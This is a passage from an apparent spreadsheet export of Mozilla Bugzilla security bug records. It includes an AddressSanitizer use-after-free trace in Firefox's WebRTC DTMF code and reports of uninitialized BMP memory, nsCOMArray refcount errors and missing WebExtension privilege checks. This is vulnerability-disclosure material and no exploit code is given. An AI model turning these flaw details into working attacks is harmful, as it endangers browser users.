			#1 0x7f94ab7d4e0f in mozilla::PeerConnectionImpl::DTMFSendTimerCallback_m(nsITimer*, void*) /builds/worker/workspace/build/src/media/webrtc/signaling/src/peerconnection/PeerConnectionImpl.cpp:3793
Firefox version: 59.0a1 (2017-12-04) (64-bit)
OS: Ubuntu 14.04 LTS
Stack trace:
	=================================================================
	==9169==ERROR: AddressSanitizer: heap-use-after-free on address 0x606000198b88 at pc 0x7f94ab7d4e10 bp 0x7ffc550cc950 sp 0x7ffc550cc948
	READ of size 4 at 0x606000198b88 thread T0 (file:// Content)
		#0 0x7f94ab7d4e0f in IsEmpty /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTStringRepr.h:186:12
		#1 0x7f94ab7d4e0f in mozilla::PeerConnectionImpl::DTMFSendTimerCallback_m(nsITimer*, void*) /builds/worker/workspace/build/src/media/webrtc/signaling/src/peerconnection/PeerConnectionImpl.cpp:3793
		#2 0x7f94a9b6a3d3 in nsTimerImpl::Fire(int) /builds/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:701:7
		#3 0x7f94a9b39af9 in nsTimerEvent::Run() /builds/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:286:11
		#4 0x7f94a9b4966e in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1033:14
		#5 0x7f94a9b653f0 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:508:10
		#6 0x7f94aa9d7984 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:125:5
		#7 0x7f94aa92e929 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
		#8 0x7f94aa92e929 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
		#9 0x7f94aa92e929 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
		#10 0x7f94b0d7f5ca in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
		#11 0x7f94b549418b in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:865:22
		#12 0x7f94aa92e929 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
		#13 0x7f94aa92e929 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
		#14 0x7f94aa92e929 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
		#15 0x7f94b5493b7d in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:691:34
		#16 0x4ee9f5 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
		#17 0x4ee9f5 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
		#18 0x7f94c6244ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
		#19 0x41e078 in _start (/home/coder/FirefoxBuilds/firefox/firefox+0x41e078)
	0x606000198b88 is located 40 bytes inside of 56-byte region [0x606000198b60,0x606000198b98)
	freed by thread T0 (file:// Content) here:
		#0 0x4bf212 in realloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:107:3
		#1 0x4f000d in moz_xrealloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:106:20
		#2 0x7f94a999c7dc in Realloc /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:214:12
		#3 0x7f94a999c7dc in nsTArrayInfallibleAllocator::ResultTypeProxy nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;::EnsureCapacity&lt;nsTArrayInfallibleAllocator&gt;(unsigned long, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:183
		#4 0x7f94ab7d413c in AppendElements&lt;nsTArrayInfallibleAllocator&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1705:49
		#5 0x7f94ab7d413c in AppendElement&lt;nsTArrayInfallibleAllocator&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1733
		#6 0x7f94ab7d413c in mozilla::PeerConnectionImpl::InsertDTMF(mozilla::TransceiverImpl&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, unsigned int, unsigned int) /builds/worker/workspace/build/src/media/webrtc/signaling/src/peerconnection/PeerConnectionImpl.cpp:2453
		#7 0x7f94ad631a03 in InsertDTMF /builds/worker/workspace/build/src/media/webrtc/signaling/src/peerconnection/PeerConnectionImpl.h:422:10
		#8 0x7f94ad631a03 in mozilla::dom::PeerConnectionImplBinding::insertDTMF(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::PeerConnectionImpl*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/PeerConnectionImplBinding.cpp:483
		#9 0x7f94aecc2ad7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3042:13
		#10 0x7f94b5761041 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
		#11 0x7f94b5761041 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
		#12 0x7f94b57470a8 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
		#13 0x7f94b57470a8 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
		#14 0x7f94b5733810 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
		#15 0x7f94b57614ce in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
		#16 0x7f94b57470a8 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
		#17 0x7f94b57470a8 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
		#18 0x7f94b5733810 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
		#19 0x7f94b57614ce in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
		#20 0x7f94b57470a8 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
		#21 0x7f94b57470a8 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
		#22 0x7f94b5733810 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
		#23 0x7f94b57614ce in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
		#24 0x7f94b5761fd2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
		#25 0x7f94b625b40c in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3036:12
		#26 0x7f94ad79bae4 in mozilla::dom::RTCDTMFSenderJSImpl::InsertDTMF(nsTSubstring&lt;char16_t&gt; const&amp;, unsigned int, unsigned int, mozilla::ErrorResult&amp;, JSCompartment*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/RTCDTMFSenderBinding.cpp:728:8
		#27 0x7f94ad8d2033 in InsertDTMF /builds/worker/workspace/build/src/obj-firefox/dom/bindings/RTCDTMFSenderBinding.cpp:891:17
		#28 0x7f94ad8d2033 in mozilla::dom::RTCDTMFSenderBinding::insertDTMF(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::RTCDTMFSender*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/RTCDTMFSenderBinding.cpp:64
		#29 0x7f94aecc2ad7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3042:13
		#30 0x7f94b5761041 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
		#31 0x7f94b5761041 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
		#32 0x7f94b57470a8 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
		#33 0x7f94b57470a8 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
		#34 0x7f94b5733810 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
		#35 0x7f94b57614ce in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
		#36 0x7f94b5761fd2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
		#37 0x7f94b6544b52 in js::ForwardingProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:176:12
		#38 0x7f94b64f261d in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /builds/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:359:23
		#39 0x7f94ab3a622b in xpc::JSXrayTraits::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;, js::Wrapper const&amp;) /builds/worker/workspace/build/src/js/xpconnect/wrappers/XrayWrapper.h:282:33
		#40 0x7f94b6522d51 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:511:21
	previously allocated by thread T0 (file:// Content) here:
		#0 0x4bee13 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
		#1 0x4efe2d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
		#2 0x7f94a999c71a in Malloc /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:211:46
		#3 0x7f94a999c71a in nsTArrayInfallibleAllocator::ResultTypeProxy nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;::EnsureCapacity&lt;nsTArrayInfallibleAllocator&gt;(unsigned long, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:136
		#4 0x7f94ab7d413c in AppendElements&lt;nsTArrayInfallibleAllocator&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1705:49
		#5 0x7f94ab7d413c in AppendElement&lt;nsTArrayInfallibleAllocator&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1733
		#6 0x7f94ab7d413c in mozilla::PeerConnectionImpl::InsertDTMF(mozilla::TransceiverImpl&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, unsigned int, unsigned int) /builds/worker/workspace/build/src/media/webrtc/signaling/src/peerconnection/PeerConnectionImpl.cpp:2453
		#7 0x7f94ad631a03 in InsertDTMF /builds/worker/workspace/build/src/media/webrtc/signaling/src/peerconnection/PeerConnectionImpl.h:422:10
		#8 0x7f94ad631a03 in mozilla::dom::PeerConnectionImplBinding::insertDTMF(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::PeerConnectionImpl*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/PeerConnectionImplBinding.cpp:483
		#9 0x7f94aecc2ad7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3042:13
		#10 0x7f94b5761041 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
		#11 0x7f94b5761041 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
		#12 0x7f94b57470a8 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
		#13 0x7f94b57470a8 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
		#14 0x7f94b5733810 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
		#15 0x7f94b57614ce in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
		#16 0x7f94b57470a8 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
		#17 0x7f94b57470a8 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
		#18 0x7f94b5733810 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
		#19 0x7f94b57614ce in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
		#20 0x7f94b57470a8 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
		#21 0x7f94b57470a8 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
		#22 0x7f94b5733810 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
		#23 0x7f94b57614ce in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
		#24 0x7f94b5761fd2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
		#25 0x7f94b625b40c in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3036:12
		#26 0x7f94ad79bae4 in mozilla::dom::RTCDTMFSenderJSImpl::InsertDTMF(nsTSubstring&lt;char16_t&gt; const&amp;, unsigned int, unsigned int, mozilla::ErrorResult&amp;, JSCompartment*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/RTCDTMFSenderBinding.cpp:728:8
		#27 0x7f94ad8d2033 in InsertDTMF /builds/worker/workspace/build/src/obj-firefox/dom/bindings/RTCDTMFSenderBinding.cpp:891:17
		#28 0x7f94ad8d2033 in mozilla::dom::RTCDTMFSenderBinding::insertDTMF(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::RTCDTMFSender*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/RTCDTMFSenderBinding.cpp:64
		#29 0x7f94aecc2ad7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3042:13
		#30 0x7f94b5761041 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
		#31 0x7f94b5761041 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
		#32 0x7f94b57470a8 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
		#33 0x7f94b57470a8 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
		#34 0x7f94b5733810 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
		#35 0x7f94b57614ce in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
		#36 0x7f94b5761fd2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
		#37 0x7f94b593cd14 in PromiseReactionJob(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/src/builtin/Promise.cpp:1238:14
		#38 0x7f94b5761041 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
		#39 0x7f94b5761041 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
		#40 0x7f94b5761fd2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
		#41 0x7f94b625b40c in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3036:12
	SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTStringRepr.h:186:12 in IsEmpty
	Shadow bytes around the buggy address:
	  0x0c0c8002b120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	  0x0c0c8002b130: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
	  0x0c0c8002b140: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd
	  0x0c0c8002b150: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa
	  0x0c0c8002b160: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
	=&gt;0x0c0c8002b170: fd[fd]fd fa fa fa fa fa fd fd fd fd fd fd fd fa
	  0x0c0c8002b180: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
	  0x0c0c8002b190: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd
	  0x0c0c8002b1a0: fd fd fd fd fa fa fa fa fa fa fa fa fa fa fa fa
	  0x0c0c8002b1b0: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
	  0x0c0c8002b1c0: fd fd fd fd fd fd fd fd fa fa fa fa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9169==ABORTING</t>
        </is>
      </c>
      <c r="X2361" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2362">
      <c r="A2362" t="n">
        <v>1094536</v>
      </c>
      <c r="B2362" t="inlineStr">
        <is>
          <t>2014-11-05 17:43:53 -0800</t>
        </is>
      </c>
      <c r="C2362" t="inlineStr">
        <is>
          <t>Apparent use of uninitialized memory when rendering BMPs on &lt;canvas&gt;</t>
        </is>
      </c>
      <c r="D2362" t="inlineStr">
        <is>
          <t>2024-05-30 08:38:12 -0700</t>
        </is>
      </c>
      <c r="E2362" t="n">
        <v>1</v>
      </c>
      <c r="F2362" t="n">
        <v>1</v>
      </c>
      <c r="G2362" t="n">
        <v>3</v>
      </c>
      <c r="H2362" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2362" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2362" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K2362" t="inlineStr">
        <is>
          <t>33 Branch</t>
        </is>
      </c>
      <c r="L2362" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2362" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2362" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2362" t="inlineStr">
        <is>
          <t>WONTFIX</t>
        </is>
      </c>
      <c r="P2362" t="inlineStr">
        <is>
          <t>[adv-main35+]</t>
        </is>
      </c>
      <c r="Q2362" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2362" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2362" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2362" t="n">
        <v>1</v>
      </c>
      <c r="U2362" t="n">
        <v>0</v>
      </c>
      <c r="V2362" t="n">
        <v>37</v>
      </c>
      <c r="W2362" t="inlineStr">
        <is>
          <t>See bug 1063733 and bug 1045977 for context. 
I swear that I'm not drip-feeding you these :-) ...but the fuzzer just spewed out another image that appears to render differently on &lt;canvas&gt; across multiple runs in 33.0.2:
http://lcamtuf.coredump.cx/ffbmp/</t>
        </is>
      </c>
      <c r="X2362" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2363">
      <c r="A2363" t="n">
        <v>322986</v>
      </c>
      <c r="B2363" t="inlineStr">
        <is>
          <t>2006-01-10 15:02:20 -0800</t>
        </is>
      </c>
      <c r="C2363" t="inlineStr">
        <is>
          <t>Migration Integration Audit</t>
        </is>
      </c>
      <c r="D2363" t="inlineStr">
        <is>
          <t>2009-11-26 05:34:36 -0800</t>
        </is>
      </c>
      <c r="E2363" t="n">
        <v>1</v>
      </c>
      <c r="F2363" t="n">
        <v>1</v>
      </c>
      <c r="G2363" t="n">
        <v>2</v>
      </c>
      <c r="H2363" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2363" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2363" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K2363" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2363" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2363" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2363" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2363" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2363" t="inlineStr"/>
      <c r="Q2363" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2363" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2363" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2363" t="n">
        <v>1</v>
      </c>
      <c r="U2363" t="n">
        <v>0</v>
      </c>
      <c r="V2363" t="n">
        <v>6</v>
      </c>
      <c r="W2363" t="inlineStr">
        <is>
          <t>Look at the code that imports from other browsers and update it to use the new Bookmarks/History APIs if necessary using #ifdef MOZ_PLACES for now. Test import from various browsers in the following cases:
"warm import" into an existing Firefox profile
"cold import" (move aside all your firefox profiles, then run firefox invoking auto-import)
There is quite a test matrix here, just look at all the migrators!</t>
        </is>
      </c>
      <c r="X2363" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2364">
      <c r="A2364" t="n">
        <v>570657</v>
      </c>
      <c r="B2364" t="inlineStr">
        <is>
          <t>2010-06-07 21:31:23 -0700</t>
        </is>
      </c>
      <c r="C2364" t="inlineStr">
        <is>
          <t>nsCOMArray is inconsistent with the order in which it releases and removes elements from the array, which can cause a refcount to be decreased more than necessary</t>
        </is>
      </c>
      <c r="D2364" t="inlineStr">
        <is>
          <t>2010-09-27 18:03:20 -0700</t>
        </is>
      </c>
      <c r="E2364" t="n">
        <v>1</v>
      </c>
      <c r="F2364" t="n">
        <v>1</v>
      </c>
      <c r="G2364" t="n">
        <v>3</v>
      </c>
      <c r="H2364" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2364" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2364" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K2364" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2364" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2364" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2364" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2364" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2364" t="inlineStr">
        <is>
          <t>[sg:critical] [qa-ntd-192] [qa-ntd-191]</t>
        </is>
      </c>
      <c r="Q2364" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2364" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2364" t="inlineStr">
        <is>
          <t>mozilla1.9.3a5</t>
        </is>
      </c>
      <c r="T2364" t="n">
        <v>1</v>
      </c>
      <c r="U2364" t="n">
        <v>0</v>
      </c>
      <c r="V2364" t="n">
        <v>12</v>
      </c>
      <c r="W2364" t="inlineStr">
        <is>
          <t>See bug 570350 comment 6 about what caused me to discover this issue.
When nsCOMArray::Clear is called, the interfaces are released *before* they're actually removed from the array.  So, given an interface which calls nsCOMArray::RemoveObject (or other similar methods) from its Release method, you could get into situations where an object is attempted to be removed twice, and therefore decrementing its refcount more than necessary.
I also see similar things in other methods handling removing items from nsCOMArrays.  I think we should have a well-defined order of "removing the object from the array and then calling Release on it, in order to avoid such problems.
The reason that I'm filing this in the security group is that it is (theoretically) possible to study our code to determine places in the code where this might happen (either now or in the future) and then construct a scenario when this caused an object to be deleted with outstanding interface pointers to it, and then use the dangling pointer in combination with other techniques to construct an attach scenario.</t>
        </is>
      </c>
      <c r="X2364" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2365">
      <c r="A2365" t="n">
        <v>1454909</v>
      </c>
      <c r="B2365" t="inlineStr">
        <is>
          <t>2018-04-18 03:51:17 -0700</t>
        </is>
      </c>
      <c r="C2365" t="inlineStr">
        <is>
          <t>No check for privileged permissions for WebExtension experiments</t>
        </is>
      </c>
      <c r="D2365" t="inlineStr">
        <is>
          <t>2019-08-07 16:57:08 -0700</t>
        </is>
      </c>
      <c r="E2365" t="n">
        <v>1</v>
      </c>
      <c r="F2365" t="n">
        <v>1</v>
      </c>
      <c r="G2365" t="n">
        <v>3</v>
      </c>
      <c r="H2365" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2365" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J2365" t="inlineStr">
        <is>
          <t>Experiments</t>
        </is>
      </c>
      <c r="K2365" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2365" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2365" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2365" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2365" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2365" t="inlineStr">
        <is>
          <t>[fixed by bug 1454820][adv-main61+][adv-esr60.1+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2365" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2365" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2365" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T2365" t="n">
        <v>1</v>
      </c>
      <c r="U2365" t="n">
        <v>0</v>
      </c>
      <c r="V2365" t="n">
        <v>47</v>
      </c>
      <c r="W2365" t="inlineStr">
        <is>
          <t>It appears there aren't any checks for bundled web extension experiments.
https://searchfox.org/mozilla-central/rev/f65d7528e34ef1a7665b4a1a7b7cdb1388fcd3aa/toolkit/components/extensions/Extension.jsm#632 doesn't check for privileged permissions.
experimentsAllowed appears never to be used:
https://searchfox.org/mozilla-central/rev/f65d7528e34ef1a7665b4a1a7b7cdb1388fcd3aa/toolkit/components/extensions/Extension.jsm#1355
I compiled the code with isPrivileged and experimentsAllowed hard coded to return false. I was still able to load an XPI built by web-ext build which was a bundled experiment through about:debugging.
This was able to set preferences etc. Is there something I am missing here?</t>
        </is>
      </c>
